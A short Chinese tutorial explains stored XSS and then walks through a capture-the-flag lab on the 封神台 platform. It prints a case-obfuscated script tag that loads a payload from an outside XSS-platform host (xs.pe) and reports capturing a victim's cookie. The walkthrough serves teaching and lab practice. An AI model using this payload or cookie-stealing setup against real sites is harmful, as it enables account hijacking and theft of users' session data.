存储型 XSS(Cross-Site Scripting,跨站脚本攻击)是一种常见的网络安全漏洞。
一、概念
存储型 XSS 是指攻击者将恶意脚本提交到目标网站的数据库中,当其他用户访问包含该恶意脚本的页面时,浏览器会执行这些恶意脚本。
二、攻击过程
攻击者寻找目标网站的漏洞,通常是输入表单、评论区等可以接受用户输入的地方。
攻击者构造包含恶意脚本的输入内容,并提交到目标网站。
目标网站将恶意脚本存储到数据库中。
其他用户访问包含恶意脚本的页面时,服务器从数据库中取出恶意脚本并发送给用户的浏览器。
用户的浏览器执行恶意脚本,可能导致用户的敏感信息被窃取、账户被劫持等后果。
常见场景为留言板 账号注册 等
封神台存储型xss演示 利用
首先看到留言板页面 联想到可能有存储型xss
尝试注入js代码使其弹窗:
成功弹出1的警告框 判断有xss漏洞
打开在线xss平台
配置代码 <sCRiPt sRC=//xs.pe/iK4></sCrIpT> //从script加载xss平台的payload
点击提交
后台提示有主机上线 查看后台
成功获取到cookie 但是没看到flag
我查看了一下官方wp flag包含在cookie栏中 评论区也有反应没看到的 应该是环境问题
总之不行就多换几个xss平台